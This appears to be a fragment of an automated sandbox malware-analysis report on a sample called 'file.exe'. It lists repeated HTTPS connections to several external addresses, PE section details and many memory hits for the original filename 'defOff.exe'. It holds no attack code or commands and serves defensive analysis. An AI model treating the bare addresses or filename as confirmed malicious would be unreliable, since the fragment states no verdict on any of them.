                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:49720 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:49728 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:49749 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49774 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49769 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.6:49799 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.6:49800 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:49823 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49841 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49889 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49892 version: TLS 1.2

                System Summary

                barindex
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exe, 00000000.00000003.2441849646.0000000005C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2463557544.0000000005DC6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2455175814.0000000005EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2463104061.0000000005C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2441677153.0000000005C5A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2442376855.0000000005C55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2437720098.0000000005A52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2451310468.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2443788234.0000000005D38000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2445290716.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2453894276.0000000005D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2453123122.0000000005D84000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2441202269.0000000005C56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2442655510.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2439889913.0000000005CFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2455658521.0000000005DA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2449390933.0000000005D6B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2448287267.0000000005C54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2443886892.0000000005C54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2442749030.0000000005D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2442194608.0000000005C56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2441935121.0000000005D1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2444647126.0000000005C5A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2463399328.0000000005C54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2455331629.0000000005C55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2456623602.0000000005C54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2444541816.0000000005E2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2444006064.0000000005D3A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2452506628.0000000005C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2451558723.0000000005E8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2439452993.0000000005C58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2446171482.0000000005E47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2445727339.0000000005D4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2445397399.0000000005D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2454884793.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2463724318.0000000005F41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2448813839.0000000005E66000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2447166055.0000000005C54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2443497848.0000000005D2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2457666219.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2442469652.0000000005D19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2444102756.0000000005C55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2444204176.0000000005D3D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2441498429.0000000005D09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2445190953.0000000005D4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2462708404.0000000005DBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2446960172.0000000005D59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2451795881.0000000005D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2448102561.0000000005E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2444855029.0000000000E9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2450343349.0000000005E79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2452033347.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2439537681.00000000058A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2439369250.00000000058A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2443398921.0000000005C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2442564475.0000000005DEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2441581995.0000000005DC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2439709295.0000000005CF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2452385174.0000000005D82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2452715930.0000000005D8C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2439802381.0000000005C53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2453645157.0000000005D9B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2451440400.0000000005D6D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2453767720.0000000005C54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2448494034.0000000005D61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2443689028.0000000005C5A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2451916267.0000000005E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2440072885.0000000005CF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2453512410.0000000005C61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2443594066.0000000005E0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2441311812.0000000005D09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2441409660.0000000005C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2446756293.0000000005C56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2462211000.0000000005DB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2437872784.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2453319005.0000000005EC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2439623869.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2440901103.0000000005CF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2447579822.0000000005C58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2442840998.0000000005C58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2462453145.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2447427597.0000000005D58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2441762077.0000000005D1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2440170489.0000000005D9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2439976280.0000000005C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2445501184.0000000005E3F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2444775984.00000000057AA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2440747104.0000000005C53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2449554469.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2445089541.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2442283844.0000000005D1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2437792556.00000000058B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2454527350.0000000005DAC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2462000268.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.2454431712.0000000005C5C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
